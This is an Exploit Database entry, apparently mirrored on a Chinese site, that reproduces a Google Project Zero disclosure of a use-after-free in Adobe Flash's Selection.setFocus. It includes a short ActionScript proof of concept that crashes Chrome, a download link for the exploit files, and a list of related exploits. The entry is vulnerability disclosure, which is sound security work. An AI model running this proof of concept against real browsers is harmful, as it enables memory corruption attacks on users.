Adobe Flash – Selection.setFocus Use-After-Free

Exploit Database
22 阅读

作者： Google Security Research

日期： 2016-08-29
类别：
- dos
平台：
- multiple
来源：https://www.exploit-db.com/exploits/40307/

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=841

There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs.

A minimal PoC follows:

var mc = this.createEmptyMovieClip( "mc", 1);
var f = Selection.setFocus;
mc.f = f;
mc.f({toString : func});

function func(){
	
	mc.removeMovieClip();
	
// Fix heap here

	}

A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40307.zip

last Exploits
Adobe Flash – Selection.setFocus Use-After-Free的更多信息

OpenBSD 5.5 – Local Kernel Panic (Denial of Service)：
Microsoft Windows 7 – win32k Bitmap Use-After-Free (MS16-062) (2)：
Elecard MPEG Player 5.7 – Local Buffer Overflow (PoC) (SEH)：
Huawei SNMPv3 Service – Multiple Buffer Overflow Vulnerabilities (PoC)：
MiniUPnP 1.4 – Multiple Denial of Service Vulnerabilities：
FlashGet 3.x – IEHelper Remote Execution (PoC)：
VideoLAN VLC Media Player 1.1.11 – ‘.amr’ Denial of Service (PoC)：
TP-Link TL-WR740N Wireless Router – Denial of Service：